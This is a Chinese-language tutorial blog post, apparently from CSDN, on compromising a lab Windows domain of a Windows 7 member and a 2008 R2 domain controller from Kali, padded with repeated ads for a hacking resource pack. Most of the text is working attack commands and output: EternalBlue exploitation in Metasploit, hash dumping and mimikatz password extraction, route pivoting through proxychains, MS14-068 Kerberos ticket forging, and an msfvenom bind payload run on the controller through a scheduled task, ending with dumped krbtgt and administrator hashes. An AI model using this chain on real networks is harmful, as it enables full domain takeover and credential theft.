域渗透——渗透域环境下的windows7与2008-r2,黑客技术零基础入门到精通实战教程建议收藏!

前言

本章介绍在windows域环境下进行渗透测试的技能。

  • 端口扫描

  • 漏洞发现

  • ms17_010永恒之蓝漏洞利用

  • 域环境信息收集

  • 横向移动

  • MS14-068漏洞利用

  • 域成员提权

  • 获取域控shell

基本环境如下,win7使用两块网卡来模拟内网穿透,在server 2008 搭建域控制器并将win7加入域中。使用kali进行内网横向渗透,获取win7与2008的主机权限 以及域账户最高权限。
在这里插入图片描述

win7作为域成员使用域成员账号win7usr 密码1237.com登录,其本地管理员账号为admin 密码123.com,2008-r2 作为域管理员 账号administrator 密码1234.com

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

域环境搭建测试

1.2008_r2 添加域服务角色,域为baidu.com
在这里插入图片描述

添加域成员账号 用户登录名win7user 密码:xxxxx
在这里插入图片描述

2.将win7加入域环境中
在这里插入图片描述

3.使用ping 命名 确保主机与主机的网络连接没有问题

测试答疑

加入了域如何登录本地管理员账号?
格式:计算机名or域名/用户。
像我的主机名为admin-pc 本地管理员账号为admin ,登录名admin-pc\admin即可登录本地账号,baidu.com\win7user即可登录域账户。
在这里插入图片描述

如何区分是本地登录还是域成员登录?请看以下一下三张图
1.加入了域的主机 域成员登录
在这里插入图片描述

2.没有加入域的win7 登录域为本计算机主机名
在这里插入图片描述

3.加入域本地登录
在这里插入图片描述

加入域主机发生最大的变化?

域控制器的管理就不说了自行百度。作为渗透者或者说攻击者,最关心的事是445服务不会被拒绝了,作为域控制器可以试用版smb服务访问任意成员主机的c$ d$ (无密码)给域成员设置执行任务,权限之高非常具有诱惑力。所以说拿下了域控制器就相当于拿下了整个内网。

主机发现&&端口服务扫描&&漏洞脚本扫描

主机发现

sudo arp-scan -l
在这里插入图片描述

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

全端口扫描

sudo nmap --min-rate 10000 -p- 20.1.1.2
在这里插入图片描述

-A参数组合了以下选项:

  1. -sS:使用TCP SYN扫描进行端口扫描,即发送SYN包并等待响应,用于确定端口的开放状态。

  2. -sV:进行服务版本探测,尝试识别目标主机上运行的服务及其版本信息。

  3. -O:进行操作系统探测,尝试识别目标主机所使用的操作系统类型。

漏洞脚本扫描

sudo nmap -p 135,139,445,5357,42902,49152,49153,49154,49155,49156,49157 --script=vuln 20.1.1.2
在这里插入图片描述

发现了 ms-17-010 永恒之蓝漏洞,这是2017发布的非常严重的一个漏洞。该漏洞无需使用任何账户密码 利用主机SMB服务即可获取主机的shell。更多细节请自行百度。

永恒之蓝获取shell

启用msfconsole
search ms17_010

设置响应参数 payload 用meterpreter的
在这里插入图片描述

run
在这里插入图片描述

进入shell ;解决乱码问题
>chcp 65001

该漏洞执行获取的是系统权限
在这里插入图片描述

主机信息收集

(以下信息仅供参考,提供一个信息收集的思路 。考虑到用户是否以登录问题,实际上收集也不是那么顺利)

查看当前所在域及当前域用户

net config workstation
在这里插入图片描述

net view 遍历信任主机
net view /domain 查看域
在这里插入图片描述

找到域控制器

1.第一种方法 net time
net time 同步域控制器的时间
在这里插入图片描述

可以收集到域控制器所在主机的计算机全名
使用ping 确定2008-r2.baidu.com的ip
在这里插入图片描述

2.第二种 查看dns服务器

一般来说 域和dns 为同一个ip
在这里插入图片描述

收集域成员的IP

在这里插入图片描述

挨个ping 计算机的名字
ping 2008-r2
结合arp -a
在这里插入图片描述

msf后渗透阶段

Hashdump获取本地密码信息

Hashdump

run windows/gather/smart_hashdump
run windows/gather/smart_dump

在这里插入图片描述

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

破解hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
admin:1000:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::

在线破解平台https://www.cmd5.com/

在这里插入图片描述

mimikatz抓取明文密码

加载模块load mimikatz
问题来了!
Msf 提供的mimikatz是一个32位的
在这里插入图片描述

而目标主机是64为的

故改变策略
准备上传minikatz64位 在目标主机上运行minikatz64

meterpreter下运行:上传upload minikatz.exe
shell下运行:.\minikatz.exe

进入minikatz首先提权:
privilege::debug
在这里插入图片描述

开始抓取明文密码
sekurlsa::logonPasswords
在这里插入图片描述

在这里插入图片描述

这里不仅抓抓到了本地用户admin 的密码 且抓到了域用户的明文密码

其他命令参考
lsadump::lsa /patch
sekurlsa::tspkg
sekurlsa::wdigest

后渗透常用模块

1.域 域控主机 ip
run post/windows/gather/enum_domain
在这里插入图片描述

run post/windows/gather/enum_ad_computers
在这里插入图片描述

2.获取登录过的用户信息
run post/windows/gather/enum_logged_on_users
在这里插入图片描述

靶机路由跳板

查看本地网卡信息

在这里插入图片描述

发现本地有两块网卡,10.1.1.1这个网段是kali访问不到的。利用msf的路由功能使kali能够访问到这个网段

增加网段路由

run autoroute -s 10.1.1.1/24
在这里插入图片描述

这条命令执行后,在msf所有的攻击载荷都可以经20.1.1.2主机转发到10.1.1.0/24这个网段。但在msf外面流量无法转发 ,我们可以使用socket进行代理。让msf转发本地namp的流量。

开启代理

use auxiliary/server/socks4a
在这里插入图片描述

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

设置 porychanins 代理 nmap 扫描

sudo vi /etc/proxychains.conf
在这里插入图片描述

proxychains nmap -sT -Pn -A 10.1.1.24

Nmap scan report for 10.1.1.24
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baidu.com, Site: Default-First-Site-Name)
445/tcp open tcpwrapped Windows Server 2008 R2 Standard 7600 tcpwrapped
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baidu.com, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open tcpwrapped
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49174/tcp open msrpc Microsoft Windows RPC
Service Info: Host: 2008-R2; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -7h59m56s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7600 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::-
| Computer name: 2008-r2
| NetBIOS computer name: 2008-R2\x00
| Domain name: baidu.com
| Forest name: baidu.com
| FQDN: 2008-r2.baidu.com
|_ System time: 2023-07-06T15:51:18+08:00
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.62 seconds

注:proxychains不代理UDP,ICMP,SYN网络协议,无法进行系统探测,主机发现等等,但是可以用-sT参数并结合-Pn进行TCP端口扫描

补充域控管理员的优势

查看域管理员成员
net group “domain admins” /domain
域管理员 可以访问任意与成员的资源 可以使用at 为域成员添加定时任务
在这里插入图片描述

域成员不可访问域控的资源

伪装票据尝试提权到域控

在主机信息收集的过程我们发现域控非常有可能使2008-r2 版本,可以尝试使用ms14-068进行横向渗透。

漏洞说明 (MS14-068;CVE-2014-6324)

这个漏洞的利用的大概过程,就是说使用现有的域成员声称自己是管理员,前去申请管理员票据权限,结果申请成功了。

  • 官方说明Microsoft Security Bulletin MS14-068 - Critical | Microsoft Docs

  • 漏洞利用条件:受该漏洞影响的操作系统,包括Win2003、Wind2008、Win2008 R2、Win2012和 Win2012 R2。利用该漏洞如果攻击者获取了域内任何一台计算机的Shell 权限,同时知道任意域用户名、SID、密码。将允许攻击者将域内任意用户权限提升至域管理级别。

  • 漏洞产生原因:用户在向 Kerberos 密钥分发中心( KDC)申请 TGT (由票据授权服务产生的身份凭证)时,可以伪造自己的Kerberos 票据。如果票据声明自己有域管理员权限,而在处理该票据时未验证票据的签名, 那么返给用户的 TGT 就使普通域用户拥有域管理员权限。该用户可以将 TGT 发送到 KDC,KDC的 TGS (票据授权服务)在验证TGT后,将服务票据(Service Ticket)发送给该用户,而该用户拥有访问任何该服务的权限,从而使攻击者可以访问域内的资源

  • 漏洞利用前提
    1.域控没有打MS14-068的补丁(KB3011780)
    2.拿下一台加入域的计算机
    3.有这台域内计算机的域用户密码和Sid
    参考文档
    https://www.cnblogs.com/f-carey/p/16843006.html#tid-zYahi8

得到本域账户的ssid

在这里插入图片描述

制造票据

此操作需要访问域控器进行网络信息交互
.\MS14-068.exe -u win7user@baidu.com -s S-1-5-21-3451455147-49433410-551211528-1104 -d 2008-r2 -p1237.com
在这里插入图片描述

or
在这里插入图片描述

导入票据

mimikatz # kerberos::ptc
在这里插入图片描述

尝试访问域控的主机资源(利用漏洞现在的win7user账户已经是管理员了)
在这里插入图片描述

访问成功,意味着提权成功

获取域管理成员的shell

*生成正向载荷*
msfvenom -p windows/meterpreter/bind_tcp LPORT=5555 -f exe -o 2008-r2.exe
在这里插入图片描述

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

开启路由
run autoroute -s 10.1.1.1/24

*copy 复制到域控*
在这里插入图片描述

*定时任务执行*
at \2008-R2 10:03:00 c:/2008-r2.exe
在这里插入图片描述

*连接域控*
use exploit/multi/handler
> set payload windows/meterpreter/bind_tcp (要路由)
在这里插入图片描述

在这里插入图片描述

收集域控信息

meterpreter > run windows/gather/smart_hashdump

meterpreter > run windows/gather/smart_hashdump

[*] Running module against 2008-R2

[*] Hashes will be saved to the database if one is connected.

[+] Hashes will be saved in loot in JtR password file format to:

[*] /root/.msf4/loot/20230708220919_default_10.1.1.24_windows.hashes_710207.txt

[+] This host is a Domain Controller!

[*] Dumping password hashes…

[-] Failed to dump hashes as SYSTEM, trying to migrate to another process

[*] Migrating to process owned by SYSTEM

[*] Migrating to wininit.exe

[+] Successfully migrated to wininit.exe

[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:a803cf45d87009c404eb89df4b1ae94c

[+] krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43544b8808b1b0e98db650b0565a24ab

[+] win7user:1104:aad3b435b51404eeaad3b435b51404ee:526ae3b352eec32faedecfd5376fed8a

[+] 2008-R2$:1000:aad3b435b51404eeaad3b435b51404ee:ecefaa33c322228f3708a824831ab50a

[+] ADMIN-PC$:1103:aad3b435b51404eeaad3b435b51404ee:a4ae89fe0372ddbd31cfc640329298db

在这里插入图片描述

解密出域控账号Administrator 密码1234.com

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值